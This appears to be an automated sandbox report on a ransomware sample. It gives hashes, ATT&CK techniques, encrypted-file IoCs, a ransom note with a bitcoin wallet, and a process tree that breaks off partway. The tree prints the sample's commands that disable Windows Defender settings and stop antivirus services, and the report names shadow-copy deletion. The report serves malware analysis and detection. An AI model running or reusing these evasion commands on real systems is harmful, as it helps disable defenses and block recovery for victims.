1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
49s
max time network
66s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Size

94KB
MD5

63f0ad9da8c823ca89c4c4ec0fce2c92
SHA1

89e66f83eee1e47b231c060034c55cd09cc84a98
SHA256

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb
SHA512

55365e3a80e5266ad79189ab80d82a5954e284f0ae63ac8ab387e351edb96213158bd00973a3db95b1280d919757125fad527f54e2e340e8324f3a62628159c3

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\RemoveRegister.raw.crypted	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
File created	C:\Users\Admin\Pictures\DismountSplit.raw.crypted	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
File created	C:\Users\Admin\Pictures\MergeCompare.tiff.crypted	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\MergeCompare.tiff	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

Drops startup file 1 IoCs

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
6776	vssadmin.exe
6712	vssadmin.exe
6692	vssadmin.exe
6680	vssadmin.exe
6768	vssadmin.exe
6672	vssadmin.exe
6784	vssadmin.exe
6720	vssadmin.exe
6792	vssadmin.exe
6756	vssadmin.exe
6748	vssadmin.exe
6736	vssadmin.exe
6728	vssadmin.exe
6700	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

6648 taskkill.exe
6640 taskkill.exe
6632 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

6548 PING.EXE

pid	process
6648	taskkill.exe
6640	taskkill.exe
6632	taskkill.exe

pid	process
6548	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exepowershell.exe

pid	process
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
3172	powershell.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
3172	powershell.exe
3172	powershell.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeIncreaseQuotaPrivilege	3172	powershell.exe
Token: SeSecurityPrivilege	3172	powershell.exe
Token: SeTakeOwnershipPrivilege	3172	powershell.exe
Token: SeLoadDriverPrivilege	3172	powershell.exe
Token: SeSystemProfilePrivilege	3172	powershell.exe
Token: SeSystemtimePrivilege	3172	powershell.exe
Token: SeProfSingleProcessPrivilege	3172	powershell.exe
Token: SeIncBasePriorityPrivilege	3172	powershell.exe
Token: SeCreatePagefilePrivilege	3172	powershell.exe
Token: SeBackupPrivilege	3172	powershell.exe
Token: SeRestorePrivilege	3172	powershell.exe
Token: SeShutdownPrivilege	3172	powershell.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeSystemEnvironmentPrivilege	3172	powershell.exe
Token: SeRemoteShutdownPrivilege	3172	powershell.exe
Token: SeUndockPrivilege	3172	powershell.exe
Token: SeManageVolumePrivilege	3172	powershell.exe
Token: 33	3172	powershell.exe
Token: 34	3172	powershell.exe
Token: 35	3172	powershell.exe
Token: 36	3172	powershell.exe
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	680	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	4204	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe
Token: SeManageVolumePrivilege	3716	powershell.exe
Token: 33	3716	powershell.exe
Token: 34	3716	powershell.exe
Token: 35	3716	powershell.exe
Token: 36	3716	powershell.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeIncreaseQuotaPrivilege	2036	powershell.exe
Token: SeSecurityPrivilege	2036	powershell.exe
Token: SeTakeOwnershipPrivilege	2036	powershell.exe
Token: SeLoadDriverPrivilege	2036	powershell.exe
Token: SeSystemProfilePrivilege	2036	powershell.exe
Token: SeSystemtimePrivilege	2036	powershell.exe
Token: SeProfSingleProcessPrivilege	2036	powershell.exe
Token: SeIncBasePriorityPrivilege	2036	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

pid	process
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

pid	process
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 472 wrote to memory of 3172	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3172	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3276	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3276	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3716	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3716	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 2036	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 2036	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 2560	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 2560	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3000	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3000	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 680	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 680	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 1008	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 1008	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3520	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 3520	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4204	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4204	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4368	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4368	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4508	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4508	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4652	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4652	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	powershell.exe
PID 472 wrote to memory of 4704	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4704	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4732	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4732	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4776	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4776	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4808	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4808	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4848	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4848	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4888	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4888	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4920	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4920	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4960	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4960	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 5000	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 5000	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 5068	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 5068	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 5112	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 5112	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4340	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4340	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 4704 wrote to memory of 4436	4704	net.exe	net1.exe
PID 4704 wrote to memory of 4436	4704	net.exe	net1.exe
PID 472 wrote to memory of 4528	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4528	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 4776 wrote to memory of 4456	4776	net.exe	net1.exe
PID 4776 wrote to memory of 4456	4776	net.exe	net1.exe
PID 4732 wrote to memory of 4692	4732	net.exe	net1.exe
PID 4732 wrote to memory of 4692	4732	net.exe	net1.exe
PID 472 wrote to memory of 4916	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 4916	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 4808 wrote to memory of 4972	4808	net.exe	net1.exe
PID 4808 wrote to memory of 4972	4808	net.exe	net1.exe
PID 472 wrote to memory of 5084	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe
PID 472 wrote to memory of 5084	472	5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:4692
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\system32\net1.exe
